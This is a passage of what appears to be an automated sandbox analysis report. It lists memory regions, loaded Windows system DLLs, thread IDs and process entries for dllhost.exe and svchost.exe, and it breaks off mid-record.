"eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2471 start_va = 0x6e940000 end_va = 0x6e96efff entry_point = 0x6e941191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2472 start_va = 0x6e970000 end_va = 0x6e980fff entry_point = 0x6e979a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2473 start_va = 0x6e9d0000 end_va = 0x6ea03fff entry_point = 0x6e9d11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2474 start_va = 0x6ea10000 end_va = 0x6ea26fff entry_point = 0x6ea11340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2475 start_va = 0x1360000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 2476 start_va = 0x6e950000 end_va = 0x6e983fff entry_point = 0x6e9511b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2477 start_va = 0x6e9c0000 end_va = 0x6e9eefff entry_point = 0x6e9c1191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2478 start_va = 0x6e9f0000 end_va = 0x6ea06fff entry_point = 0x6e9f1340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2479 start_va = 0x6ea10000 end_va = 0x6ea20fff entry_point = 0x6ea19a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2480 start_va = 0x1ac0000 end_va = 0x1afffff entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 2481 start_va = 0x6e940000 end_va = 0x6e96efff entry_point = 0x6e941191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2482 start_va = 0x6e970000 end_va = 0x6e980fff entry_point = 0x6e979a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2483 start_va = 0x6e9d0000 end_va = 0x6ea03fff entry_point = 0x6e9d11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2484 start_va = 0x6ea10000 end_va = 0x6ea26fff entry_point = 0x6ea11340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2485 start_va = 0x1d20000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 2486 start_va = 0x6e950000 end_va = 0x6e983fff entry_point = 0x6e9511b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2487 start_va = 0x6e9c0000 end_va = 0x6e9eefff entry_point = 0x6e9c1191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2488 start_va = 0x6e9f0000 end_va = 0x6ea06fff entry_point = 0x6e9f1340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2489 start_va = 0x6ea10000 end_va = 0x6ea20fff entry_point = 0x6ea19a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2490 start_va = 0x16a0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 2491 start_va = 0x6e940000 end_va = 0x6e96efff entry_point = 0x6e941191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2492 start_va = 0x6e970000 end_va = 0x6e980fff entry_point = 0x6e979a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2493 start_va = 0x6e9d0000 end_va = 0x6ea03fff entry_point = 0x6e9d11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2494 start_va = 0x6ea10000 end_va = 0x6ea26fff entry_point = 0x6ea11340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2495 start_va = 0x1f80000 end_va = 0x1fbffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 2496 start_va = 0x6e950000 end_va = 0x6e983fff entry_point = 0x6e9511b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2497 start_va = 0x6e9c0000 end_va = 0x6e9eefff entry_point = 0x6e9c1191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2498 start_va = 0x6e9f0000 end_va = 0x6ea06fff entry_point = 0x6e9f1340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2499 start_va = 0x6ea10000 end_va = 0x6ea20fff entry_point = 0x6ea19a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2500 start_va = 0x1340000 end_va = 0x137ffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 2501 start_va = 0x6e940000 end_va = 0x6e96efff entry_point = 0x6e941191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2502 start_va = 0x6e970000 end_va = 0x6e980fff entry_point = 0x6e979a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2503 start_va = 0x6e9d0000 end_va = 0x6ea03fff entry_point = 0x6e9d11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2504 start_va = 0x6ea10000 end_va = 0x6ea26fff entry_point = 0x6ea11340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2652 start_va = 0x70210000 end_va = 0x7023efff entry_point = 0x70211191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2653 start_va = 0x70d60000 end_va = 0x70d79fff entry_point = 0x70d70ae3 region_type = mapped_file name = "dot3api.dll" filename = "\\Windows\\System32\\dot3api.dll" Region: id = 2654 start_va = 0x6e960000 end_va = 0x6e98efff entry_point = 0x6e961191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2655 start_va = 0x6e9e0000 end_va = 0x6ea13fff entry_point = 0x6e9e11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2656 start_va = 0x70d40000 end_va = 0x70d50fff entry_point = 0x70d49a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2657 start_va = 0x70d60000 end_va = 0x70d76fff entry_point = 0x70d61340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2658 start_va = 0x71e80000 end_va = 0x71e85fff entry_point = 0x71e81a24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" Region: id = 2659 start_va = 0x71e90000 end_va = 0x71ea5fff entry_point = 0x71e91240 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" Region: id = 2660 start_va = 0x1350000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 2661 start_va = 0x6e950000 end_va = 0x6e983fff entry_point = 0x6e9511b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2662 start_va = 0x70210000 end_va = 0x7023efff entry_point = 0x70211191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2663 start_va = 0x70d40000 end_va = 0x70d56fff entry_point = 0x70d41340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2664 start_va = 0x70d60000 end_va = 0x70d70fff entry_point = 0x70d69a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2665 start_va = 0x6e9f0000 end_va = 0x6ea1efff entry_point = 0x6e9f1191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2666 start_va = 0x70d40000 end_va = 0x70d59fff entry_point = 0x70d50ae3 region_type = mapped_file name = "dot3api.dll" filename = "\\Windows\\System32\\dot3api.dll" Region: id = 2667 start_va = 0x6e9e0000 end_va = 0x6ea13fff entry_point = 0x6e9e11b0 region_type = mapped_file name = "onex.dll" filename = "\\Windows\\System32\\onex.dll" Region: id = 2668 start_va = 0x70210000 end_va = 0x7023efff entry_point = 0x70211191 region_type = mapped_file name = "eappcfg.dll" filename = "\\Windows\\System32\\eappcfg.dll" Region: id = 2669 start_va = 0x70d40000 end_va = 0x70d50fff entry_point = 0x70d49a4c region_type = mapped_file name = "eappprxy.dll" filename = "\\Windows\\System32\\eappprxy.dll" Region: id = 2670 start_va = 0x70d60000 end_va = 0x70d76fff entry_point = 0x70d61340 region_type = mapped_file name = "wlanhlp.dll" filename = "\\Windows\\System32\\wlanhlp.dll" Region: id = 2671 start_va = 0x71e80000 end_va = 0x71e85fff entry_point = 0x71e81a24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" Region: id = 2672 start_va = 0x71e90000 end_va = 0x71ea5fff entry_point = 0x71e91240 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" Region: id = 2674 start_va = 0x3b0000 end_va = 0x3b4fff entry_point = 0x3b0000 region_type = mapped_file name = "sysmain.dll.mui" filename = "\\Windows\\System32\\en-US\\sysmain.dll.mui" Region: id = 2675 start_va = 0x1720000 end_va = 0x175ffff entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 2676 start_va = 0x19e0000 end_va = 0x1adffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 2677 start_va = 0x1da0000 end_va = 0x219ffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 2678 start_va = 0x2560000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 2679 start_va = 0x2760000 end_va = 0x2b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 2680 start_va = 0x2b60000 end_va = 0x335ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 2681 start_va = 0x75bc0000 end_va = 0x75bc7fff entry_point = 0x75bc10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" Region: id = 2682 start_va = 0x75450000 end_va = 0x75457fff entry_point = 0x754534d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" Thread: id = 162 os_tid = 0x72c Thread: id = 163 os_tid = 0x49c Thread: id = 164 os_tid = 0x404 Thread: id = 165 os_tid = 0x400 Thread: id = 166 os_tid = 0x3e0 Thread: id = 167 os_tid = 0x3dc Thread: id = 168 os_tid = 0x3d4 Thread: id = 169 os_tid = 0x3d0 Thread: id = 170 os_tid = 0x3c0 Thread: id = 171 os_tid = 0x3bc Thread: id = 172 os_tid = 0x388 Thread: id = 173 os_tid = 0x384 Thread: id = 174 os_tid = 0x374 Thread: id = 175 os_tid = 0x370 Thread: id = 176 os_tid = 0x358 Thread: id = 177 os_tid = 0x354 Thread: id = 178 os_tid = 0x340 Thread: id = 179 os_tid = 0x33c Thread: id = 180 os_tid = 0x730 Thread: id = 181 os_tid = 0x738 Thread: id = 196 os_tid = 0x8d8 Thread: id = 197 os_tid = 0x8e0 Thread: id = 198 os_tid = 0x8ec Thread: id = 200 os_tid = 0x8f4 Thread: id = 202 os_tid = 0x908 Thread: id = 207 os_tid = 0x934 Thread: id = 208 os_tid = 0x940 Thread: id = 236 os_tid = 0x994 Thread: id = 237 os_tid = 0x9a4 Thread: id = 238 os_tid = 0x9a8 Thread: id = 239 os_tid = 0x9ec Thread: id = 266 os_tid = 0xb54 Thread: id = 267 os_tid = 0xb9c Process: id = "18" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x7f0a8180" os_pid = "0x7cc" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x470" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" Region: id = 2174 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2175 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2176 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2177 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 2178 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2179 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2180 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2181 start_va = 0xe0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2182 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2183 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2184 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 2185 start_va = 0x360000 end_va = 0x364fff entry_point = 0x361609 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" Region: id = 2186 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 2187 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2188 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2189 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2190 start_va = 0x1180000 end_va = 0x11bffff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 2191 start_va = 0x1240000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 2192 start_va = 0x1280000 end_va = 0x154efff entry_point = 0x1280000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 2193 start_va = 0x1550000 end_va = 0x158ffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 2194 start_va = 0x15c0000 end_va = 0x15fffff entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 2195 start_va = 0x1600000 end_va = 0x16defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001600000" filename = "" Region: id = 2196 start_va = 0x1760000 end_va = 0x176ffff entry_point = 0x0 region_type = private name = "private_0x0000000001760000" filename = "" Region: id = 2197 start_va = 0x71b20000 end_va = 0x71b35fff entry_point = 0x71b21d6d region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" Region: id = 2198 start_va = 0x71e20000 end_va = 0x71ea3fff entry_point = 0x71e219a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" Region: id = 2199 start_va = 0x74b10000 end_va = 0x74b4ffff entry_point = 0x74b1a2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" Region: id = 2200 start_va = 0x74b50000 end_va = 0x74c44fff entry_point = 0x74b60d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" Region: id = 2201 start_va = 0x75520000 end_va = 0x7555afff entry_point = 0x7552128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" Region: id = 2202 start_va = 0x75780000 end_va = 0x75795fff entry_point = 0x75782dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" Region: id = 2203 start_va = 0x75c00000 end_va = 0x75c0bfff entry_point = 0x75c010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 2204 start_va = 0x75ca0000 end_va = 0x75cadfff entry_point = 0x75ca1235 region_type = mapped_file name = "RpcRtRemote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" Region: id = 2205 start_va = 0x75f30000 end_va = 0x75f79fff entry_point = 0x75f37de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 2206 start_va = 0x75fb0000 end_va = 0x75fcefff entry_point = 0x75fb1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 2207 start_va = 0x76010000 end_va = 0x7605dfff entry_point = 0x76019c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 2208 start_va = 0x76110000 end_va = 0x761b0fff entry_point = 0x76142433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 2209 start_va = 0x761c0000 end_va = 0x7626bfff entry_point = 0x761ca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 2210 start_va = 0x76270000 end_va = 0x76338fff entry_point = 0x7628d711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 2211 start_va = 0x764e0000 end_va = 0x77129fff entry_point = 0x76561601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" Region: id = 2212 start_va = 0x77130000 end_va = 0x771cffff entry_point = 0x771449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 2213 start_va = 0x77580000 end_va = 0x7761cfff entry_point = 0x775b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 2214 start_va = 0x77620000 end_va = 0x7777bfff entry_point = 0x7766ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 2215 start_va = 0x77780000 end_va = 0x77853fff entry_point = 0x777cbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 2216 start_va = 0x77860000 end_va = 0x778b6fff entry_point = 0x77879ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 2217 start_va = 0x77a00000 end_va = 0x77a8efff entry_point = 0x77a03fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 2218 start_va = 0x77a90000 end_va = 0x77b5bfff entry_point = 0x77a9168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 2219 start_va = 0x77b60000 end_va = 0x77c9bfff entry_point = 0x77b60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 2220 start_va = 0x77cb0000 end_va = 0x77cb4fff entry_point = 0x77cb1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" Region: id = 2221 start_va = 0x77cc0000 end_va = 0x77cc9fff entry_point = 0x77cc136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 2222 start_va = 0x77ce0000 end_va = 0x77cf8fff entry_point = 0x77ce4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 2223 start_va = 0x77d00000 end_va = 0x77d82fff entry_point = 0x77d023d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 2224 start_va = 0x77da0000 end_va = 0x77da0fff entry_point = 0x77da0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 2225 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2226 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2227 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 2228 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 2229 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2230 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 2231 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 2232 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2233 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 186 os_tid = 0xc0 Thread: id = 187 os_tid = 0x7fc Thread: id = 188 os_tid = 0x7f8 Thread: id = 189 os_tid = 0x7f4 Thread: id = 190 os_tid = 0x7f0 Thread: id = 191 os_tid = 0x7d4 Thread: id = 192 os_tid = 0x7d0 Process: id = "19" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f0a8320" os_pid = "0x5ac" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x3f0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" Region: id = 2505 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2506 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2507 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2508 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2509 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 2510 start_va = 0xc0000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2511 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 2512 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2513 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2514 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2515 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2516 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2517 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2518 start_va = 0x2a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2519 start_va = 0x3b0000 end_va = 0x3cbfff entry_point = 0x3b0000 region_type = mapped_file name = "FirewallAPI.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" Region: id = 2520 start_va = 0x3d0000 end_va = 0x3d7fff entry_point = 0x3d2104 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" Region: id = 2521 start_va = 0x3e0000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2522 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2523 start_va = 0x430000 end_va = 0x430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 2524 start_va = 0x440000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2525 start_va = 0x480000 end_va = 0x487fff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2526 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2527 start_va = 0x4d0000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2528 start_va = 0x510000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2529 start_va = 0x610000 end_va = 0xa02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2530 start_va = 0xa10000 end_va = 0xa11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 2531 start_va = 0xa20000 end_va = 0xa20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 2532 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 2533 start_va = 0xa80000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 2534 start_va = 0xae0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 2535 start_va = 0xb30000 end_va = 0xb6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 2536 start_va = 0xb70000 end_va = 0xe3efff entry_point = 0xb70000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 2537 start_va = 0xe60000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2538 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 2539 start_va = 0xf20000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 2540 start_va = 0x1040000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 2541 start_va = 0x1080000 end_va = 0x10bffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 2542 start_va = 0x10d0000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 2543 start_va = 0x1110000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2544 start_va = 0x11d0000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 2545 start_va = 0x1210000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 2546 start_va = 0x1260000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 2547 start_va = 0x1360000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 2548 start_va = 0x13b0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 2549 start_va = 0x13f0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 2550 start_va = 0x1510000 end_va = 0x154ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 2551 start_va = 0x15e0000 end_va = 0x15effff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 2552 start_va = 0x1610000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 2553 start_va = 0x1660000 end_va = 